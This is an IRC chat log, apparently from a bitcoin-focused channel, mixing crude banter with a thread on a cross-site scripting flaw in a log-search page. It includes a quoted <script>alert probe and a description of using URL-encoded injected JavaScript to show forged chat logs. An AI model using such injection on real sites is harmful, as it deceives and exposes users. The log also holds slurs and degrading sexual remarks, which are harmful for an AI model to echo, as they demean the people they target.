| asciilifeform: | thought so. | [12:30] |
| * asciilifeform | brb | [12:32] |
| asciilifeform: | mircea_popescu: entirely troo, there are no mechanical prostheses for love, loyalty, honour. the ancients -- knew this. | [12:35] |
| mircea_popescu: | !#s flirty fishing | [12:35] |
| a111: | 0 results for "flirty fishing", http://btcbase.org/log-search?q=flirty%20fishing | [12:35] |
| mircea_popescu: | in vaguely related lulz : there existed a cult which had the girls prostitute themselves for membership. (apparently it was tried with boys too, but it didn't pay.) eventually they just listed them as proper whores with "escort agencies". apparently a total of >quarter million men were made to feel religious however briefly during a decade. | [12:36] |
| mircea_popescu: | IN THE SEVENTIES. | [12:37] |
| BingoBoingo: | AHA, the Family! | [12:37] |
| mircea_popescu: | "Children of god" / aka varous | [12:37] |
| asciilifeform: | i thought this was sop for meatcults | [12:37] |
| mircea_popescu: | notrly afaik | [12:37] |
| asciilifeform: | hm. gotta wonder then, wainot | [12:37] |
| mircea_popescu: | because usually cults are build around a paranoid not a narcisiac | [12:38] |
| mircea_popescu: | wants to fuck them himself, and what he can't fuck he kills. | [12:38] |
| asciilifeform: | subj lit is so laden with desinfo that asciilifeform has genuinely nfi | [12:39] |
| asciilifeform: | ( enemy has a very good idea of the efficacy of the mircea_popescu form of harem org , and tries to burn it down wherever and however the chance presents itself ) | [12:40] |
| asciilifeform: | recall few yrs back during 1st obummer term, for instance, when they set to work on the remaining ortho-mormons | [12:41] |
| mod6: | the warren jefferies thing? | [12:42] |
| mircea_popescu: | i dunno that any of those has anything to do with my harem tbh. | [12:43] |
| asciilifeform: | mircea_popescu: only in so much as the mosquitoes in my backyard have to do with your skin | [12:45] |
| douchebag: | 1BTC reward? I'm up for that challenge any day | [12:45] |
| mircea_popescu: | well, no, i mean something like "just because it has cogs in it doesn't mean it's a clock, could be a car transmission" | [12:45] |
| asciilifeform: | mircea_popescu: to carry the analogy, luddite dun care whether clock or orrery, thinks 'gears' | [12:46] |
| ben_vulpes: | douchebag: how does what you found get leveraged into 'fake irc logs'? | [12:46] |
| mircea_popescu: | asciilifeform http://trilema.com/wp-content/uploads/2018/01/Documents_of_the_Assembly_of_the_State_of_New_York_1838.pdf | [12:46] |
| asciilifeform: | mircea_popescu: eggog | [12:46] |
| mircea_popescu: | and yes but that doesn't make the luddite right in any meaningful sense | [12:46] |
| douchebag: | Able to inject Javascript, such javascript could be used to create a link that leads to logs that appear real, however they're completely fake | [12:46] |
| mircea_popescu: | asciilifeform hmm, spermissions ? lemme see. | [12:47] |
| douchebag: | Basically, the javascript could be used to remove the logs that exist (on the client side mind you), and add in logs that are fake | [12:47] |
| douchebag: | It would all be within the url | [12:47] |
| ben_vulpes: | douchebag: so someone sends someone else a link with ?q=<script="diddledepageforme">, and unsuspecting b copies, pastes, reads everything but the url bar? | [12:48] |
| douchebag: | It could be URL encoded, so they wouldn't really be able to read anything | [12:48] |
| douchebag: | So yeah, people who know what the typical url format is would likely know right away that something is up | [12:48] |
| * ben_vulpes | is reminded of the doctorow pulp, "human readable" | [12:49] |
| asciilifeform: | mircea_popescu: loads nao | [12:49] |
| mircea_popescu: | cool. | [12:49] |
| mircea_popescu: | ben_vulpes could just put it in an "url shortener" | [12:50] |
| mircea_popescu: | dork reads it off mobile or w/e. | [12:50] |
| mircea_popescu: | the whole issue of http://btcbase.org/log/2018-01-26#1776941 is FAR REACHING. | [12:50] |
| a111: | Logged on 2018-01-26 16:34 asciilifeform: but conceivably one day there will be an idjit browser that gives obama root on yer box when it sees string 'open sesame'. and what, errybody gotta know in advance to escape 'open sesame', lol ? | [12:50] |
| asciilifeform: | mircea_popescu: that wouldn't run js in the log page tho | [12:50] |
| ben_vulpes: | oh i get it | [12:51] |
| douchebag: | yes it would | [12:51] |
| asciilifeform: | douchebag: with urlshortener ?! | [12:51] |
| douchebag: | url -> url w/ js added in vuln parameter | [12:51] |
| douchebag: | -> user | [12:51] |
| asciilifeform: | no i get how original worx | [12:51] |
| asciilifeform: | but in re mircea_popescu's variant | [12:51] |
| douchebag: | i gotta run, be back in about 30 mins | [12:53] |
| phf: | http://btcbase.org/log/2018-01-26#1776698 << if alf don't wan em, i'll take em | [12:58] |
| a111: | Logged on 2018-01-26 05:04 mircea_popescu: meanwhile in girls alf won't like, http://78.media.tumblr.com/33cb28925c37b2cd04d9ff82a675d37d/tumblr_nh7rhnlD9v1qd7u7zo1_1280.jpg | [12:58] |
| asciilifeform: | lol | [12:59] |
| asciilifeform: | http://btcbase.org/log/2018-01-26#1777052 << i'd like to make such a challenge. but turns out that we do not even yet have a usable formula for what exactly even is an exploit. | [12:59] |
| a111: | Logged on 2018-01-26 17:45 douchebag: 1BTC reward? I'm up for that challenge any day | [12:59] |
| asciilifeform: | it is almost like trying to define humour | [13:00] |
| asciilifeform: | 'is this funny' | [13:01] |
| asciilifeform: | there is the element of surprise , i.e. ' i had nfi that it would do X ' . but this is subjective, and impossible to say in advance that ' you had nfi that it would X ' | [13:02] |
| asciilifeform: | mircea_popescu for instance prolly knew that one could paste a js into his php thing. but had no particular reason to give a damn | [13:02] |
| phf: | http://btcbase.org/log/2018-01-26#1776788 << jeez, gtfo | [13:03] |
| a111: | Logged on 2018-01-26 08:44 douchebag: <script>alert`OHAI`</script> | [13:03] |
| asciilifeform: | phf: i am at this point nearly convinced that working with www stack -- even moar so than, say, work with retarded children -- is destructive to one's own higher brain | [13:04] |
| asciilifeform: | the fruit hang so low , all muscles atrophy. | [13:05] |
| asciilifeform: | but even worse -- the type of effort that the work rewards, is exactly the wrong type | [13:06] |
| BingoBoingo: | <asciilifeform> http://btcbase.org/log/2018-01-26#1777052 << i'd like to make such a challenge. but turns out that we do not even yet have a usable formula for what exactly even is an exploit. << Dude finds way through pehbot commands to replace host machine BIOS with "Hypercard" binary that shipped with OS7 | [13:07] |
| a111: | Logged on 2018-01-26 17:45 douchebag: 1BTC reward? I'm up for that challenge any day | [13:07] |
| mircea_popescu: | lmao | [13:07] |
| asciilifeform: | BingoBoingo: for instance. | [13:07] |
| asciilifeform: | BingoBoingo: why not add 'and burns down the box' also. | [13:08] |
| asciilifeform: | coming next, pole vaulting contest where folx hop over the trump tower. | [13:08] |
| BingoBoingo: | asciilifeform: Burns down box leaves less to confirm by reading failROM | [13:08] |
| mircea_popescu: | phf o yeah i know you're the fancy playboy type. | [13:08] |
| asciilifeform: | BingoBoingo: let's develop your picture. because it still isn't a complete one . because e.g. knowing the magicpacket for that particular box's nic, is not 'exploit for ffa', it is for $nic. | [13:10] |
| asciilifeform: | just like if a d00d managed to sneak in and steal it, it ain't 'exploit for ffa' . etc | [13:10] |
| BingoBoingo: | asciilifeform: You failed to spec that part. You spec'd pehbot | [13:10] |
| asciilifeform: | BingoBoingo: the whole thread is re the impossibility of a satisfying spec of any such kind. | [13:11] |
| asciilifeform: | and it specifically does not admit room for inclusion by 'failed to spec X'. | [13:11] |
| BingoBoingo: | That is a point. | [13:14] |
| asciilifeform: | hey BingoBoingo , recall james randi's flower pot ? | [13:15] |
| asciilifeform: | same type of problem. | [13:15] |
| asciilifeform: | i dun think that it is solvable as-stated. | [13:15] |
| mircea_popescu: | it's very solvable as stated, but not mechanically. "1. figure out v 2. press pehbot 3. say intelligent things about it." "intelligent according to whom ?" "intelligent according to me" "how am i supposed to cheat this ?!" "you aren't." | [13:16] |
| asciilifeform: | right, not mechanically. | [13:16] |
| mircea_popescu: | http://btcbase.org/log/2018-01-26#1777090 << for all you know this is how kock-weimer goes too. | [13:17] |
| a111: | Logged on 2018-01-26 18:02 asciilifeform: mircea_popescu for instance prolly knew that one could paste a js into his php thing. but had no particular reason to give a damn | [13:17] |
| mircea_popescu: | it's ~certainly~ in the list of things they'd spew once put to the question. | [13:17] |
| asciilifeform: | certainly would | [13:17] |
| asciilifeform: | not that it'd do'em any good. | [13:17] |
| asciilifeform: | the difference b/w http://btcbase.org/log/2018-01-26#1776941 and e.g. koch-rng remains apparent to anybody with half a brain | [13:18] |
| a111: | Logged on 2018-01-26 16:34 asciilifeform: but conceivably one day there will be an idjit browser that gives obama root on yer box when it sees string 'open sesame'. and what, errybody gotta know in advance to escape 'open sesame', lol ? | [13:18] |
| BingoBoingo: | In other exploits, tonight I will be sleeping in a different bed because axe time gas time has some for the chinches de cama! | [13:19] |
| asciilifeform: | i must admit to BingoBoingo , i have not yet experienced the 'joys' of this insect | [13:20] |
| BingoBoingo: | Eh, not such a big deal. First weeks the bites itch and then your immune system stops caring and you cease to get quite the histamine reaction to the bites. | [13:21] |
| mircea_popescu: | asciilifeform with half a brain is not mechanically | [13:21] |
| asciilifeform: | ifonly this worked for mosquito. | [13:21] |
| asciilifeform: | mircea_popescu: this is correct. which is why we dun have mechanisms judging kochs. | [13:22] |
| mircea_popescu: | how's the cocksuckers BingoBoingo ? apparently moar bloodsuckers. | [13:23] |
| asciilifeform: | now to revisit upstack, once i describe peh-rsa , and demonstrate signing etc, it will be possible to make straightforward mechanical puzzle for whoever wants to play. | [13:23] |
| mircea_popescu: | there is that. | [13:23] |
| mircea_popescu: | could even pehbot encrypt a privkey. | [13:24] |
| asciilifeform: | e.g. 'make your invalid sig of $item cause my verifier to say 'valid' ' etc. | [13:24] |
| asciilifeform: | mircea_popescu: or that. ( the difficulty with privkeys-as-prizes is to show that they are in in fact inside the prizebox prior to play ) | [13:25] |
| mircea_popescu: | myeah. | [13:25] |
| ben_vulpes: | douchebag: ty, fixed | [13:25] |
| mircea_popescu: | you're right, it's not quite as good. | [13:25] |
| deedbot: | http://www.thedrinkingrecord.com/2018/01/26/mcdonalds-the-gringo-gets-his-groove-back/ << Bingo Blog - McDonalds: The Gringo Gets His Groove Back | [13:25] |
| BingoBoingo: | mircea_popescu: Starting to get more attention for them again as my confidence recovers from the past weekend | [13:25] |
| mircea_popescu: | that's good. | [13:25] |
| * mircea_popescu | has had the following unpleasant experience : was going to take whore tribe horseback riding called whorelist, "o sure, pick me up ?" called horse farms "nope, wounded/gone/booked/etc". HOW!!! could it be harder to get horses than whores! | [13:26] |
| mircea_popescu: | what, is it by leg count ? | [13:27] |
| BingoBoingo: | Mebbe horses provide less useful error messages to the locals? Thusly there were many available horses until they hit the same fate the cars do. | [13:28] |
| mircea_popescu: | maybe. | [13:28] |
| mircea_popescu: | or maybe the chinese don't ship hay flavoured chips. | [13:29] |
| BingoBoingo: | Possible | [13:29] |
| asciilifeform: | horse himself suffers the disadvantage of being edible | [13:29] |
| asciilifeform: | possibly -- that's where they went. | [13:29] |
| asciilifeform: | like , supposedly, in ro. | [13:29] |
| mircea_popescu: | i never saw horsemeat here, you know that ? | [13:30] |
| asciilifeform: | there was this rumour of a 1time massive horse-to-sausage conversion when eu pressed on a ban against horse on roads | [13:30] |
| mircea_popescu: | eh, greatly exaggerated. | [13:30] |
| asciilifeform: | it's exactly the kind of thing that would be greatlyexaggerated. so i have nfi. | [13:31] |
| mircea_popescu: | the true horse killing was in 50s, when ceausescu decided to force agromecanization | [13:31] |
| asciilifeform: | fefeleagaization lol | [13:31] |
| mircea_popescu: | 60s* | [13:31] |
| mircea_popescu: | prolly a million heads give or take. | [13:31] |
| asciilifeform: | ( orwell aficionados will also remember his version of fefeleaga's bator , the sad horse character boxer ) | [13:32] |
| phf: | http://btcbase.org/log/2018-01-26#1776919 << could be the flip side of http://trilema.com/2012/strategic-superiority-a-saga/ | [13:32] |
| a111: | Logged on 2018-01-26 16:15 mircea_popescu: in fairness, kid's got me meditating about the nature of things ever since last night. see, the trouble is : in his syustem, he has actually found a vulnerability, as a factual matter. in my system this is entirely meaningless. why the difference ? | [13:32] |
| mircea_popescu: | i'm sure. | [13:33] |
| phf: | http://btcbase.org/log/2018-01-26#1777009 << this is exactly how "secoority" snake oil propagates: cheap tricks | [13:42] |
| a111: | Logged on 2018-01-26 17:12 mircea_popescu: not if it works to deliver the results above ? | [13:42] |
| mircea_popescu: | phf is this repackageable into a puritan argument against sluts ? if not, why not ? | [13:43] |
| phf: | i don't know the puritan arguments against sluts | [13:43] |
| mircea_popescu: | you may not be aware, but the ~original~ repression of faggotry has everything in common with the original repression of jews, masons, etc : it was perceived by the "normal" man that these "perverts" have it TOO EASY. | [13:43] |
| mircea_popescu: | it's "unfair" (in the exact sense of childhood playground) and therefore "forbidden". because... obviously you can find a MALE partner to work with the question is to get one of the speaking cows to do it. | [13:44] |
| mircea_popescu: | so men who fuck men have an "unwarranted" social advantage, and consequently off with their heads. | [13:45] |
| mircea_popescu: | obviously fucking the boss is mandatory in the workplace but this is specifically what http://trilema.com/2012/reguli-pentru-iobagi/ DIDNT want. | [13:45] |
| phf: | wake me when there's a "too easy" on btcbase | [13:47] |
| mircea_popescu: | and so : a homebreaker is a female that delivers on the "easy" part which "anyone could do" (sex) and not on the hard part -- and there's no quotes there because how about YOU try polishing an oaken table the size of a current usian garage each morning, plus rub the iron pots. | [13:48] |
| mircea_popescu: | phf how's that related ? | [13:48] |
| douchebag: | alright, I'm back | [13:49] |
| mircea_popescu: | !~google he's here, he's here, he's here have no fear, stay by his side an' he'll take you for a ride... | [13:50] |
| jhvh1: | mircea_popescu: Nana – He's Comin' Lyrics | Genius Lyrics: <https://genius.com/Nana-hes-comin-lyrics> Nana - He's Comin' Lyrics | LetsSingIt Lyrics: <https://www.letssingit.com/nana-lyrics-he-s-comin-qkcsz32> Songtext von Nana - He's Comin' Lyrics: <http://www.songtexte.com/songtext/nana/hes-comin-73c2661d.html> | [13:50] |
| phf: | mircea_popescu: i'm perhaps failing to find a point at which your analogy connects with the situation. i read it as "don't know on things that seem trivial" | [13:53] |
| asciilifeform: | mircea_popescu: the 'anyone could cheat with witchcraft' thing is a recurring motif in idjit pygmystans , verily | [13:53] |
| phf: | *don't knock | [13:53] |
| asciilifeform: | ( but pointedly not in ~all~ pygmistans. recall the 'ru prison cheating at cards is not cheating if not obvious' thread ) | [13:54] |
| mircea_popescu: | phf no, no, the structure of the argument, "X propagates via r-selection" is not delivering on what i expect is the intent ("of COURSE x is "bad" in the sense of illegitimate). | [13:55] |
| mircea_popescu: | the problem is that illegitimacy crosses a definition boundry (it doesn't mean the same thing in boston wharf side and in african village) and so leaves us stranded. | [13:55] |
| mircea_popescu: | asciilifeform it is, at that. and in ru prison is "not cheating if ~not caught~, to an ellaborate standard of wot-proof. which takes us straight into http://trilema.com/2014/un-prophete/#selection-53.90-53.169 sadness | [13:57] |
| asciilifeform: | and to the 'mechanical puzzle' thread, aha. | [13:59] |
| phf: | oh i finally got it | [14:05] |
| phf: | yes, totally unrelated, yeesh slow day. | [14:05] |
| douchebag: | Alright, what do you guys suppose I do I've been trying to find vulns in Starbucks pretty much all night with very little success. Should I continue hitting this bug bounty, or switch over to Yahoo's program? | [14:07] |
| phf: | but, the intent wasn't actually "of course x is bad", we've had conversation about that elsewhere, this was a pure cause/purpose "you're fat" situation: that's literally how security theater propagates! | [14:08] |
| mircea_popescu: | consider just how weak this "r selection = bad" argument by looking at the principal class of problem we know a (sorta) solution for today. why even have bitcoin nodes when you could have a central server ? http://btcbase.org/log/2018-01-25#1776507 ? | [14:09] |
| a111: | Logged on 2018-01-25 23:37 NoSatoshisHear: centralized system, so one server counts the ticks, it would simply be a demo of reddit "the button" style idiocy combined with gambling. Sounds viral, like the 1918 flu. | [14:09] |
| mircea_popescu: | phf ah, so it was just stating the obvious for some reason ? i'm... aware that's how it propagatges o.O | [14:09] |
| phf: | well, i didn't know if you were aware, and i can always fall back to the usual log "but tis was for the reader!" | [14:10] |
| mircea_popescu: | (the truth of the matter is that the power of human speech comes from parsing and collapsing very lengthy and complex trees one of the rules is "obvious branch is dead", which means you practically never assume one's stating the obvious, so you pick the alternative) | [14:10] |
| mircea_popescu: | phf certainly. | [14:10] |
| mircea_popescu: | phf the actual trick i use to force a "no, go down obv branch" is by prepending a "you know" or whatever. but, sure. | [14:11] |
| phf: | i've seen the machinery work many times, though for some reason it reminded me of the case where it misfired, in a famous bit by feynman where he was cracking safes at los alamos, security resolution and the unexpected punchline is "don't let feynman near your safes" | [14:15] |
| BingoBoingo: | douchebag: Have you tried flipping a coin? Or failing that tire flipping a bit? | [14:16] |
| douchebag: | Not really too much, I've held onto coin and made a bit here and there. Typically I end up selling it right away so that I can get my cash in hand and not have to worry about waiting for the price to fluctuate. I know I should have held onto it | [14:20] |
| * trinque | gives this "pls to mirror back to me that am doing smart things smartly" hours to live | [14:22] |
| douchebag: | Considering I looked at one of my wallets and $50 transactions are now worth roughly $20,0000 | [14:22] |
| douchebag: | $20,000* | [14:22] |
| asciilifeform: | douchebag: does it ever bother you that you sell a $10k info for $1k ? | [14:24] |
| asciilifeform: | ( or 100, for 10, etc ) | [14:25] |
| BingoBoingo: | douchebag: I mean in the physical sense. You know... the old fashioned kind of flip and coin. Or flip and tire. | [14:26] |
| douchebag: | Not really, I know that by responsibly disclosing vulnerabilites to companies I am building a pretty awesome resume which will benefit me later in life | [14:27] |
| asciilifeform: | douchebag: on the contrary. | [14:27] |
| asciilifeform: | !#s responsible disclosure | [14:27] |
| a111: | 30 results for "responsible disclosure", http://btcbase.org/log-search?q=responsible%20disclosure | [14:27] |
| asciilifeform: | ^ mandatory reading. | [14:27] |
| douchebag: | Everyone else I know is working some shitty job, not getting a decent amount of experience, and they're just kind of stuck in the same place. Meanwhile, I'm just entertaining myself with the challenge of hacking these companies | [14:29] |
| trinque: | douchebag: your "write-only" mode grows tiresome | [14:29] |
| * shinohai | snickers a bit @ 'responsible disclosure' | [14:30] |
| trinque: | nobody is inviting you to "be in the republic in your own way" | [14:30] |
| asciilifeform: | douchebag: do you realize that you are doing the equiv of showing up at e.g. google campus and repainting the stairs in exchange for the pennies accidentally dropped there ? | [14:30] |
| asciilifeform: | the most abject kind of slavery known, really | [14:31] |
| asciilifeform: | !~google mudlarks | [14:32] |
| jhvh1: | asciilifeform: Mudlark - Wikipedia: <https://en.wikipedia.org/wiki/Mudlark> Museum of London :: Mudlarks children's gallery: <https://www.museumoflondon.org.uk/museum-london-docklands/permanent-galleries/mudlarks-childrens-gallery> Mudlarks of the 1700 and 1800s - Geri Walton: <https://www.geriwalton.com/child-mudlarks/> | [14:32] |
| douchebag: | Eh, perhaps. It's mainly just a hobby of mine, and I'm constantly learning from it and it pays the bills for now. | [14:33] |
| douchebag: | What do you suggest I do? | [14:34] |
| shinohai: | Read the logs for starters. | [14:34] |
| asciilifeform: | douchebag: look in the subjline for this chan | [14:34] |
| asciilifeform: | for instance. | [14:34] |
| douchebag: | Well, I'm not the best programmer out there however I always make damn sure the code I do write is secure as it can be | [14:40] |
| asciilifeform: | how is this statement a commentary on the item in the subjline ? | [14:40] |
| douchebag: | "V. You could learn how to program correctly, such as for instance by writing your own Vvi implementation, or by standing up an irc botvii, or by following the excellent manuals produced by the Lordshipviii. Bear in mind that it is deemed unethical within the Republic to write code if you haven't actually learned how to write it first, and that orcs' claims to have taught you something often turn out | [14:41] |
| douchebag: | fraudulent upon examination." | [14:41] |
| trinque: | douchebag: skipped right over the reading *again* did you | [14:42] |
| douchebag: | Well, I'm just trying to figure out where my skillset could be best put to use, I would be more than capable of writing a V implementation or setting up an IRC bot. I'm trying to leave it to you guys to tell me where my skillset could best be put to use | [14:46] |
| lobbes: | douchebag: while you are intelligent, and may have succeeded in sending mp to meditation room, realize that continued existence in this forum is predicated on you doing something useful for the Republic. Understanding -what- is useful will require (as trinque has been patiently explaining) "moar ready, less talky". | [14:47] |
| shinohai: | !!rate douchebag -1 *autistic screeching | [14:47] |
| deedbot: | Get your OTP: http://p.bvulpes.com/pastes/MFYD0/?raw=true | [14:47] |
| lobbes: | Else that happens ^^ | [14:47] |
| asciilifeform: | douchebag: start with v | [14:47] |
| ben_vulpes: | http://btcbase.org/log/2018-01-23#1774923 | [14:47] |
| a111: | Logged on 2018-01-23 20:04 ben_vulpes: ours mostly | [14:47] |
| trinque: | several folks told douchebag here to do various somethings | [14:48] |
| asciilifeform: | douchebag: alternatively, ( or best of all, in conjunction ) read the ffa series and do the exercises. | [14:48] |
| lobbes: | douchebag, -as you read more- the "how can I best use my skillset" will become obvious to you | [14:48] |
| trinque: | ayep | [14:49] |
| shinohai: | !!v F446A115E51B6AB6665F943C47F5DBADD60D81F06A76C65156E43F4710A7B46C | [14:49] |
| deedbot: | shinohai rated douchebag -1 << *autistic screeching | [14:49] |
| * trinque | ftr thinks it's nice to see someone that shows up and wants to do *anything* aside pull his dick | [14:49] |
| asciilifeform: | trinque: aha! | [14:49] |
| trinque: | just, the dickpulling can now go. | [14:49] |
| asciilifeform: | but asciilifeform for one will read his vtron. and ffa homework answers. | [14:50] |
| asciilifeform: | supposing he produces any. | [14:50] |
| shinohai: | Could have used skills to hack CoinCheck, been 530M usd richer | [14:50] |
| asciilifeform: | shinohai: naaah, see, not 'responsibledisclosure' is it nao. | [14:51] |
| asciilifeform: | d00d gotta cure himself first, of the headcockroaches | [14:51] |
| shinohai: | Precisely my point. | [14:51] |
| asciilifeform: | shinohai, trinque : as i understand, d00d is a kid, and really oughta be beaten with wooden stick, and only after this fails, with spiked iron stick. | [15:03] |
| shinohai: | Beatings bring about character development! | [15:04] |
| asciilifeform: | i dun see any reason to think that he is incurable. | [15:04] |
| asciilifeform: | ( yet ) | [15:04] |
| douchebag: | I would like to clarify with someone that I properly understand everything required to create a V implementation. | [15:04] |
| shinohai: | No, not incurable, but simply needs to do time in the logs, etc. to cure the aforementioned head cockroaches. | [15:05] |
| trinque: | asciilifeform: shinohai negrated him all by himself | [15:05] |
| trinque: | I don't see where I condemned | [15:05] |
| asciilifeform: | douchebag: observe that you can readily test what you make : massive amount of vpatch published , at e.g. http://btcbase.org/patches | [15:05] |
| asciilifeform: | trinque: i can readily see that you have not yet condemned , aha | [15:06] |
| ben_vulpes: | douchebag: so demonstrate it, yeah? talk is cheap. | [15:06] |
| asciilifeform: | douchebag: this is not miserable american school . shoot first ask questions second. make a vtron. if its function diverges in some way from previous vtrons, you will a) notice b) find out why c ) then, ~maybe~ later ask others, if cannot determine solution on your own | [15:07] |
| douchebag: | I'll write something up and let one of you take a look at it when I'm finished. | [15:09] |
| ben_vulpes: | i'll certainly read it | [15:11] |
| ben_vulpes: | gonna post on medium or what? | [15:11] |
| douchebag: | It'll most likely be it's own web application. | [15:12] |
| ben_vulpes: | wutwutwut? a vtron webapp? | [15:12] |
| shinohai: | Oh dear lord | [15:13] |
| trinque: | hey, phf has one | [15:13] |
| ben_vulpes: | i'm curious, not casting aspersions | [15:13] |
| ben_vulpes: | douchebag: surely you're not thinking of something that would eat a mess of patches and sigs and vomit forth a press, are you? | [15:14] |
| douchebag: | Pardon? | [15:15] |
| shinohai: | I'm genuinely curious to see gpg operations performed in a web app. | [15:15] |
| ben_vulpes: | douchebag: howabout you tell me what this "it's own web application" is going to do | [15:15] |
| shinohai: | (https://www.igolder.com/pgp/generate-key/) | [15:15] |
| mod6: | before writing a vtron, maybe spend sometime using one. | [15:15] |
| asciilifeform: | it did not even occur to me that chukcha is a writer and not a reader, and has not used | [15:16] |
| asciilifeform: | presumably has, or will use, then -- write. | [15:16] |
| ben_vulpes: | douchebag: mod6 has a point, consider pressing a trb and syncing it douchebag | [15:16] |
| douchebag: | That | [15:17] |
| trinque: | we'll never know which is a nick reference and which isn't! | [15:17] |
| douchebag: | That's probably a good idea before I start. | [15:17] |
| ben_vulpes: | still curious in re what this hypothetical webapp would do | [15:17] |
| asciilifeform: | ben_vulpes: imho even a straight cleanroom clone of http://btcbase.org/patches wouldn't be entirely useless | [15:18] |
| asciilifeform: | ( supposing it works ) | [15:18] |
| ben_vulpes: | asciilifeform: let the kid speak for himself, eh? | [15:19] |
| asciilifeform: | let the d00d write his vtron. it's a homework, not a heroic quest . then -- beat with sticks. not before. | [15:19] |
| asciilifeform: | ben_vulpes: i fully expect that he'll speak, lol | [15:19] |
| douchebag: | Well, the web application would just be for viewing purposes, the PGP operations will still be done via command line. I am quite comfortable writing web apps using Python's Flask web framework | [15:19] |
| trinque: | I see guidance, not beating, no harm there | [15:19] |
| ben_vulpes: | guidance and beatins can be hard to distinguish at twenty feet when kiddo's reaching for the stove | [15:20] |
| trinque: | haw | [15:20] |
| * asciilifeform | bbl,meat | [15:20] |
| ben_vulpes: | douchebag: do yr marching orders make sense? | [15:20] |
| douchebag: | http://therealbitcoin.org/ml/btc-dev/2015-August/000161.html <- I'm looking at this right now, to get an understanding of what I'll be making. | [15:23] |
| ben_vulpes: | there's also http://cascadianhacker.com/07_v-tronics-101-a-gentle-introduction-to-the-most-serene-republic-of-bitcoins-cryptographically-backed-version-control-system | [15:24] |
| douchebag: | I do not know what marching orders are at this time, I'm going to have to read more into it to better understand | [15:24] |
| shinohai: | ben_vulpes link is most definitely required reading imho | [15:24] |
| ben_vulpes: | douchebag: press a trb with non-"release" patches so's you understand usage, ideally sync the binary if you can afford the hardware. then, write your own v, test it, and bring it back for review. | [15:25] |
| douchebag: | Forsure, is there one you suggest me starting with? | [15:26] |
| ben_vulpes: | one what | [15:28] |
| douchebag: | V implementation to use so that I understand how everything is working together | [15:28] |
| ben_vulpes: | asciilifeform's elaborates the fundamentals, mod6 has polished his to handle a bunch of edge cases. | [15:29] |
| ben_vulpes: | it is a matter of taste. would you rather read python or perl? | [15:29] |
| mod6: | fwiw, if you're comfortable with py, and you're on a learning quest, then start with alf's | [15:30] |
| douchebag: | I prefer Python | [15:42] |
| shinohai: | http://archive.is/KoGnA <<< Not mentioned here, how Coincheck asked the NEM developers to roll back chain ala mETH to recover losses. | [15:46] |
| ben_vulpes: | aaaand at the intersection of pantsuit and me too streets: http://archive.is/xKXxl | [16:57] |
| shinohai: | Her "Faith adviser" no less! Must have counseled 'ol Bill too. | [16:59] |
| phf: | "The currency of the far-right: why neo-Nazis love bitcoin (The Guardian)" | [17:15] |
| phf: | "... Only joint action by the G20 countries, as proposed by France and Germany, could be enough to become a game changer. ..." | [17:16] |
| phf: | articled penned by one Julia Ebner, who also wrote "The Rage: The Vicious Circle of Islamist and Far Right Extremism" https://www.vox.com/world/2017/12/19/16764046/islam-terrorism-far-right-extremism-isis | [17:19] |
| phf: | wherein she blames far right for creating and feeding islamic extrimism | [17:20] |
| mircea_popescu: | http://btcbase.org/log/2018-01-26#1777200 << well, does it ever bother you you spend an hour you'll never ever get back ? | [17:30] |
| a111: | Logged on 2018-01-26 19:24 asciilifeform: douchebag: does it ever bother you that you sell a $10k info for $1k ? | [17:30] |
| mircea_popescu: | http://btcbase.org/log/2018-01-26#1777253 <<->> http://btcbase.org/log/2018-01-25#1775921 | [17:34] |
| a111: | Logged on 2018-01-26 20:04 douchebag: I would like to clarify with someone that I properly understand everything required to create a V implementation. | [17:34] |
| a111: | Logged on 2018-01-25 01:01 mircea_popescu: v is esentially found today as an enchanted castle surrounded by 5000 rakes upon which the prince is welcome to step, and once he stepped he can come to us and by the shape in his forehead we can describe the rake he stepped on. | [17:34] |
| mircea_popescu: | gol step. | [17:34] |
| mircea_popescu: | go* | [17:34] |
| mircea_popescu: | lmao the zingers. | [17:35] |
| mod6: | haha. | [17:48] |
| shinohai: | In other competence of the feebs news: http://archive.is/Un7mm | [18:09] |
| mircea_popescu: | http://btcbase.org/log/2018-01-26#1777309 << yeah, right. to reiterate, a) http://btcbase.org/log/2014-02-07#487027 and b) nobody fucking walks. | [18:19] |
| a111: | Logged on 2018-01-26 22:16 phf: "... Only joint action by the G20 countries, as proposed by France and Germany, could be enough to become a game changer. ..." | [18:19] |
| a111: | Logged on 2014-02-07 15:23 mircea_popescu: "Remember : we know where YOU live." | [18:19] |
| mircea_popescu: | better make sure there's replacement "representatives" "presidents" etcetera for the WHOLE list. | [18:19] |
| mircea_popescu: | meanwhile in efervescences, http://coupleamateursbellespoitrines.c.o.pic.centerblog.net/tumblr_mr10x0cH0h1s3uxuxo1_1280.jpg | [18:36] |
| asciilifeform: | mircea_popescu: rerun ! | [18:50] |
| asciilifeform: | i could've sworn i saw it 2-3y ago | [18:50] |
| mircea_popescu: | well... if you do this many shows eventually you're gonna have to rely on reruns! | [18:51] |
| asciilifeform: | http://btcbase.org/log/2018-01-26#1777312 << every day, lol | [18:52] |
| a111: | Logged on 2018-01-26 22:30 mircea_popescu: http://btcbase.org/log/2018-01-26#1777200 << well, does it ever bother you you spend an hour you'll never ever get back ? | [18:52] |
| mircea_popescu: | so stop being so bothered! :D | [18:52] |
| asciilifeform: | http://btcbase.org/log/2018-01-26#1777305 << 'One of Japan’s biggest cryptocurrency exchanges said that about $400 million in NEM tokens ...' >> asciilifeform was replacing a ceiling light and lost a screw, which he arbitrarily will value at 500 trillion unified reformed dubloons | [18:54] |
| a111: | Logged on 2018-01-26 20:46 shinohai: http://archive.is/KoGnA <<< Not mentioned here, how Coincheck asked the NEM developers to roll back chain ala mETH to recover losses. | [18:54] |
| mircea_popescu: | i have about $1 trillion in trimmed pubic hairs. they, unlike a "transgender", are actually female, being XX. | [18:55] |
| shinohai: | There's actually a market for shaved pubic hair! lol | [18:55] |
| mircea_popescu: | i'm thinking of branching out into plucked. | [18:56] |
| asciilifeform: | http://btcbase.org/log/2018-01-26#1777321 << observe that in all such cases under modern usg, the corpse 'hangs' on the designated gallows bird and never on the gestapo ( who can machine-gun or even demolish, as in florida 2y ago, entire houses , with clear conscience ) | [18:56] |
| a111: | Logged on 2018-01-26 23:09 shinohai: In other competence of the feebs news: http://archive.is/Un7mm | [18:56] |
| mircea_popescu: | asciilifeform the more interesting point is that purely latino style "kidnappings" are moving into the us in complete defiance of "law enforcement". | [18:57] |
| asciilifeform: | ( iirc in all 50 states at this point, if even local cop runs somebody over on his way to arresting a pickpocket, corpse 'hangs' on the pickpocket ) | [18:57] |
| mircea_popescu: | the battle has evidently been lost. | [18:57] |
| asciilifeform: | mircea_popescu: eh those have been a thing for many years | [18:57] |
